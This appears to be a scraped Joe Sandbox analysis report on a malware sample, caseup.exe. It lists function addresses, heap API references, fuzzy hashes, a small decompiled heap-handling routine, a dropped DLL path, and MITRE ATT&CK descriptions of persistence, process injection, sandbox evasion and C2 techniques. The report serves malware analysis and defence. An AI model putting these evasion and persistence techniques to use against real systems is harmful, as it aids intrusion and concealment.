0x7fef30bccfc
0x7fef30bcd00
0x7fef30bcd05
0x7fef30bcd10
0x7fef30bcd14
0x7fef30bcd1c
0x7fef30bcd27
0x7fef30bcd2b
0x7fef30bcd2f
0x7fef30bcd33
0x7fef30bcd37
0x7fef30bcd3b
0x7fef30bcd40
0x7fef30bcd4b
0x7fef30bcd56
0x7fef30bcd5e
0x7fef30bcd61
0x7fef30bcd69
0x7fef30bcd71
0x7fef30bcd75
0x7fef30bcd80
0x7fef30bcd8a
0x7fef30bcdb4

APIs

HeapFree.KERNEL32 ref: 000007FEF30BCC0E
HeapFree.KERNEL32 ref: 000007FEF30BCC2A
HeapFree.KERNEL32 ref: 000007FEF30BCC63
HeapFree.KERNEL32 ref: 000007FEF30BCCE2
HeapFree.KERNEL32 ref: 000007FEF30BCD9A

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 06e0fcf20ea57ac3211b22a367270edb58e8ed46151080f4deadd4d977991074
Instruction ID: 485a29bbcd7fcf41c97475de1c2c36570ea342b2669fe0f0380e01eb4ee5b7ac
Opcode Fuzzy Hash: 06e0fcf20ea57ac3211b22a367270edb58e8ed46151080f4deadd4d977991074
Instruction Fuzzy Hash: 90914A72908B8195E7A5CF21F8543AAB3B6F789784F548226EACC43B68DF3CD194D740

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30727D7 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 303
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30727D7(void* __rax, void* __rdx, intOrPtr* __r8, void* __r9) {
				void* _t2;

				if (__r9 != 4) goto 0xf307282a;
				E000007FE7FEF305A520();
				if (__rax == 0) goto 0xf3072840;
				r8d = 0x220;
				E000007FE7FEF30F1E10();
				 *((intOrPtr*)(__rax + 0x220)) =  *__r8;
				return _t2;
			}

0x7fef30727e2
0x7fef30727f4
0x7fef30727fc
0x7fef3072801
0x7fef307280d
0x7fef3072812
0x7fef3072829

APIs

Part of subcall function 000007FEF305A520: GetProcessHeap.KERNEL32(?,?,?,000007FEF3068FDD), ref: 000007FEF305A534

HeapFree.KERNEL32 ref: 000007FEF3072A3E

Strings

t failed, xrefs: 000007FEF30729FB
encrypt , xrefs: 000007FEF30729EE

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: encrypt $t failed
API String ID: 3859560861-6015957
Opcode ID: 1f0578f8a78aa08475af2f210d6b77edbc37361e5634e555fdaded987c56581d
Instruction ID: 02b274e8c90f26798563a982cbfeb99481680973d795d3a5e0b0d18234acdc81
Opcode Fuzzy Hash: 1f0578f8a78aa08475af2f210d6b77edbc37361e5634e555fdaded987c56581d
Instruction Fuzzy Hash: 1ED1D577A087819AE7648F26E5403AEB7B5F789780F448126EF8D07BA5DB3CE195D300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A7958 Relevance: 5.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000007FEF30A7973
HeapFree.KERNEL32 ref: 000007FEF30A798D
HeapFree.KERNEL32 ref: 000007FEF30A79C0
HeapFree.KERNEL32 ref: 000007FEF30A79E2

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: cba0509a4b82320c9cdb45bcdbdc1c5d0822786cd225f0d2a6dade1b4275c96f
Instruction ID: 201ad1f247c8b6d67b66fb55a87e0a46243e3876e76ca46be0634996b1280d93
Opcode Fuzzy Hash: cba0509a4b82320c9cdb45bcdbdc1c5d0822786cd225f0d2a6dade1b4275c96f
Instruction Fuzzy Hash: 4321D076D08A8185F7A89B66F4543FD63A3F788B44F44C0338A9E462B5DE3CE485E340

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report caseup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\StndUpdate\UimbTD.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Statistics

Windows Analysis Report
caseup.exe

Function 000007FEF30452B3 Relevance: 196.3, APIs: 118, Strings: 10, Instructions: 4322
memoryCOMMONCrypto

Function 000007FEF30452A6 Relevance: 106.7, APIs: 60, Strings: 9, Instructions: 3234
memoryCOMMONCrypto

Function 000007FEF304F85D Relevance: 83.7, APIs: 43, Strings: 4, Instructions: 1409
COMMONCrypto

Function 000007FEF30BB7C0 Relevance: 51.6, APIs: 24, Strings: 5, Instructions: 880
memorynetworkCOMMONCrypto

Function 000007FEF304DFF4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 421
memoryfileCOMMONCrypto

Function 000007FEF30B96A4 Relevance: 34.3, APIs: 10, Strings: 12, Instructions: 1345
memoryCOMMONCrypto

Function 000007FEF304BF20 Relevance: 33.0, APIs: 17, Strings: 4, Instructions: 1474
memoryCOMMONCrypto

Function 000007FEF304F0D5 Relevance: 30.1, APIs: 12, Strings: 5, Instructions: 397
memoryprocessCOMMONCrypto

Function 000007FEF30B4FBA Relevance: 23.5, APIs: 12, Strings: 3, Instructions: 977
memoryCOMMONCrypto

Function 000007FEF304E75F Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 261
memoryprocessCOMMONCrypto

Function 000007FEF30B7E38 Relevance: 20.1, APIs: 4, Strings: 7, Instructions: 817
networkmemoryCOMMONCrypto

Function 000007FEF304EC54 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 275
memoryCOMMONCrypto

Function 000007FEF30B111D Relevance: 14.6, APIs: 6, Strings: 2, Instructions: 589
memorynetworkCOMMONCrypto

Function 000007FEF30B6ED4 Relevance: 8.1, APIs: 3, Strings: 2, Instructions: 637
COMMONCrypto

Function 000007FEF304329C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 838
COMMONCrypto

Function 000007FEF30FE9AA Relevance: 1.6, Strings: 1, Instructions: 359
COMMONCrypto

Function 000007FEF30428BC Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 205
memoryCOMMON

Function 000007FEF30A2F00 Relevance: 9.1, APIs: 6, Instructions: 62
networkCOMMON

Function 000007FEF3061D6A Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306
COMMON